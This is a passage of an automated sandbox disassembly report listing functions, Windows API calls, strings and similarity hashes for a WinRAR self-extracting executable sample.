                                                                                    • API ID: AddressProc$CurrentProcess
                                                                                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                    • API String ID: 2190909847-396321323
                                                                                    • Opcode ID: 9baef310df209d78b6a0f2997f2c58566735c1bac32deb7a4e133a552a8e4612
                                                                                    • Instruction ID: 067fe5557029f324737cdcbff435072b5d3c5ffb3d6ca702f92b691d38d38c7d
                                                                                    • Opcode Fuzzy Hash: 9baef310df209d78b6a0f2997f2c58566735c1bac32deb7a4e133a552a8e4612
                                                                                    • Instruction Fuzzy Hash: 16112931600739ABDF15EF20FC4566E3764FF05760B04823AFC025B262DABC9D418695
                                                                                    Function 0073101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateThread.KERNEL32(00000000,00010000,00731160,?,00000000,00000000), ref: 00731043
                                                                                    • SetThreadPriority.KERNEL32(?,00000000), ref: 0073108A
                                                                                      • Part of subcall function 00726C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00726C54
                                                                                      • Part of subcall function 00726DCB: _wcschr.LIBVCRUNTIME ref: 00726E0A
                                                                                      • Part of subcall function 00726DCB: _wcschr.LIBVCRUNTIME ref: 00726E19
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                                                                    • String ID: CreateThread failed
                                                                                    • API String ID: 2706921342-3849766595
                                                                                    • Opcode ID: f032abed455112b54a1f959d6787a5d81e04ebe1988f0e812243d7d9130640fd
                                                                                    • Instruction ID: 0a8009cc8bade56628ba07e67d621f4ed6e2280baf961a9279ce8eb76758a1f9
                                                                                    • Opcode Fuzzy Hash: f032abed455112b54a1f959d6787a5d81e04ebe1988f0e812243d7d9130640fd
                                                                                    • Instruction Fuzzy Hash: CE01FEB534430D6FE7346F64AC55BB6B359EB40751F20042EF947521D1CEE96CC54624
                                                                                    Function 0073E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualQuery.KERNEL32(80000000,0073E5E8,0000001C,0073E7DD,00000000,?,?,?,?,?,?,?,0073E5E8,00000004,00781CEC,0073E86D), ref: 0073E6B4
                                                                                    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0073E5E8,00000004,00781CEC,0073E86D), ref: 0073E6CF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoQuerySystemVirtual
                                                                                    • String ID: D
                                                                                    • API String ID: 401686933-2746444292
                                                                                    • Opcode ID: 3cc46104928e7bf24cee3b1a87fd9824c176e966fc549ee99292de41e3794dd2
                                                                                    • Instruction ID: 5e51fd8a5fbb5a4a55810aa635fc8f55a8f1d82a1c4fdbe83dcb222c15e01a90
                                                                                    • Opcode Fuzzy Hash: 3cc46104928e7bf24cee3b1a87fd9824c176e966fc549ee99292de41e3794dd2
                                                                                    • Instruction Fuzzy Hash: 54012B32600609ABDF14DE29DC49BDD7BAAEFC4324F0CC120ED59D7191DA3CDD058680
                                                                                    Function 0072C058 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcschr
                                                                                    • String ID: <9u$?*<>|"
                                                                                    • API String ID: 2691759472-1881834610
                                                                                    • Opcode ID: 9dbe60ce3a1ff67ab8ea4464e774f43190686f163ae3b34976749307b15c9b46
                                                                                    • Instruction ID: 5e5c9f2ee500926741c626ae99eaaa3765fc4562f73a282fb6db53df7c550436
                                                                                    • Opcode Fuzzy Hash: 9dbe60ce3a1ff67ab8ea4464e774f43190686f163ae3b34976749307b15c9b46
                                                                                    • Instruction Fuzzy Hash: B8F0D153A44321C1C7311A29BC01B3AB3E4EFB5720F38081EE5C8872D2E6AD98C082A5
                                                                                    Function 0073DB4B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID: Software\WinRAR SFX$s
                                                                                    • API String ID: 176396367-1940952233
                                                                                    • Opcode ID: a2f7858828853faf5b3324e8a9fc47da9411bf70777e75fca36d080999616ee5
                                                                                    • Instruction ID: 48507f90ec90bce6ed1680bf04316e0f32df55c2ca5ea6f8d98407865afee027
                                                                                    • Opcode Fuzzy Hash: a2f7858828853faf5b3324e8a9fc47da9411bf70777e75fca36d080999616ee5
                                                                                    • Instruction Fuzzy Hash: 87015EB1500158FAEB219B59DC0AFDF7F6DEB04790F104051F549A10A1DBA88A88CBA1
                                                                                    Function 0073AE2F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0072C29A: _wcslen.LIBCMT ref: 0072C2A2
                                                                                      • Part of subcall function 00731FDD: _wcslen.LIBCMT ref: 00731FE5
                                                                                      • Part of subcall function 00731FDD: _wcslen.LIBCMT ref: 00731FF6
                                                                                      • Part of subcall function 00731FDD: _wcslen.LIBCMT ref: 00732006
                                                                                      • Part of subcall function 00731FDD: _wcslen.LIBCMT ref: 00732014
                                                                                      • Part of subcall function 00731FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0072B371,?,?,00000000,?,?,?), ref: 0073202F
                                                                                      • Part of subcall function 0073AC04: SetCurrentDirectoryW.KERNELBASE(?,0073AE72,C:\Users\user\AppData\Local\Temp\RarSFX0,00000000,0076946A,00000006), ref: 0073AC08
                                                                                    • _wcslen.LIBCMT ref: 0073AE8B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$CompareCurrentDirectoryString
                                                                                    • String ID: <s$C:\Users\user\AppData\Local\Temp\RarSFX0
                                                                                    • API String ID: 521417927-3664127294
                                                                                    • Opcode ID: afb9d24a5428b5eec10b21dded05f905b683d6856d60d11691f609b6b7a0c3fd
                                                                                    • Instruction ID: 577924695887aec87bb4f9a5d0816fced120350d8bc816eccce599a375e60d9a
                                                                                    • Opcode Fuzzy Hash: afb9d24a5428b5eec10b21dded05f905b683d6856d60d11691f609b6b7a0c3fd
                                                                                    • Instruction Fuzzy Hash: 540112B1D40259E5EF11ABA4DD0BEDF77BCAF08700F000465F646E3192EABC96448BA6
                                                                                    Function 0074BB4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007497E5: GetLastError.KERNEL32(?,00761030,00744674,00761030,?,?,00743F73,00000050,?,00761030,00000200), ref: 007497E9
                                                                                      • Part of subcall function 007497E5: _free.LIBCMT ref: 0074981C
                                                                                      • Part of subcall function 007497E5: SetLastError.KERNEL32(00000000,?,00761030,00000200), ref: 0074985D
                                                                                      • Part of subcall function 007497E5: _abort.LIBCMT ref: 00749863
                                                                                    • _abort.LIBCMT ref: 0074BB80
                                                                                    • _free.LIBCMT ref: 0074BBB4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast_abort_free
                                                                                    • String ID: pu
                                                                                    • API String ID: 289325740-250260183
                                                                                    • Opcode ID: 4334e62ace8828b6508e91b77488816a0597478057637650a1372c843bb51792
                                                                                    • Instruction ID: 096740b26a2266ced25d17f2b1adb2ccebdabeca602073fbcd02731de166b1cb
                                                                                    • Opcode Fuzzy Hash: 4334e62ace8828b6508e91b77488816a0597478057637650a1372c843bb51792
                                                                                    • Instruction Fuzzy Hash: 7F0196B1D01735DBCB26AF58840266DB771FF08721B154119F82467695CB7DAD01CFC5
                                                                                    Function 0073B425 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Malloc
                                                                                    • String ID: (s$Zs
                                                                                    • API String ID: 2696272793-2692220788
                                                                                    • Opcode ID: 2da00c85135a6212284b032ac407ffb0ed2bdb9e7a90f394bd3f27a5fa5dad80
                                                                                    • Instruction ID: 88f12c3d791fe56934e6999635a79c971134ecfd10cd54866c1222a8a4c97071
                                                                                    • Opcode Fuzzy Hash: 2da00c85135a6212284b032ac407ffb0ed2bdb9e7a90f394bd3f27a5fa5dad80
                                                                                    • Instruction Fuzzy Hash: 6A0186B6640108FFDF018FB0DC49CEEBBADEF08340B104159B906D7120E635AA04DBA4
                                                                                    Function 00730FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00731206,?), ref: 00730FEA
                                                                                    • GetLastError.KERNEL32(?), ref: 00730FF6
                                                                                      • Part of subcall function 00726C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00726C54
                                                                                    Strings
                                                                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00730FFF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                    • API String ID: 1091760877-2248577382
                                                                                    • Opcode ID: 1664807d70748182be6a0d80c9f881c4131744438cee2955c90745af24283dc0
                                                                                    • Instruction ID: 91f37aa08218467ade51aee10557c940de274cd74cfd876c7909ae71a13b797c
                                                                                    • Opcode Fuzzy Hash: 1664807d70748182be6a0d80c9f881c4131744438cee2955c90745af24283dc0
                                                                                    • Instruction Fuzzy Hash: 5CD02E72508330BACA103324AC0ECAF39058B22332FA04B29F43D642F2CA6D0DD162A6
                                                                                    Function 0072E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,0072DA55,?), ref: 0072E2A3
                                                                                    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0072DA55,?), ref: 0072E2B1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindHandleModuleResource
                                                                                    • String ID: RTL
                                                                                    • API String ID: 3537982541-834975271
                                                                                    • Opcode ID: 96f76ebb34acafb5de1eea9ada4911ab1451ba888fea626aa53005261f6fa7a5
                                                                                    • Instruction ID: f24c956be31c2b16c2c4696e12303af4db430bed32cfcfd2d5130dfe37c61b62
                                                                                    • Opcode Fuzzy Hash: 96f76ebb34acafb5de1eea9ada4911ab1451ba888fea626aa53005261f6fa7a5
                                                                                    • Instruction Fuzzy Hash: 56C0123124071066F63057757C0DBC7AA599B00B92F05444CB585E91E1D6EDC54486E0
                                                                                    Function 0073E470 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E467
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: ps$zs
                                                                                    • API String ID: 1269201914-2747536401
                                                                                    • Opcode ID: 8daf7e19e9692e087354920e21b1c05544c862a07d543d25323f8778de25f784
                                                                                    • Instruction ID: cef22403aebc703913f984fcfb3ec82691d1fbc6288f62bc3bd165665b678059
                                                                                    • Opcode Fuzzy Hash: 8daf7e19e9692e087354920e21b1c05544c862a07d543d25323f8778de25f784
                                                                                    • Instruction Fuzzy Hash: 93B012C1699280FC3104A1181D06D77010DC0C4F51B30903EFC04C00C3D88C4D040533
                                                                                    Function 0073E455 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E467
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: Us$zs
                                                                                    • API String ID: 1269201914-1410283396
                                                                                    • Opcode ID: 363c4d5bce0990b50d9777ccdbfc480d79e8e83cdc88ac42f66277039f47b5ba
                                                                                    • Instruction ID: 348bd8c305deb2a2cf2fc514d57cf9018f198e80382013b99427d1c61694988a
                                                                                    • Opcode Fuzzy Hash: 363c4d5bce0990b50d9777ccdbfc480d79e8e83cdc88ac42f66277039f47b5ba
                                                                                    • Instruction Fuzzy Hash: 50B012D1698240FC310421141D06C77020DC0C0F15B30D03EFE00D40C3D88D0F050433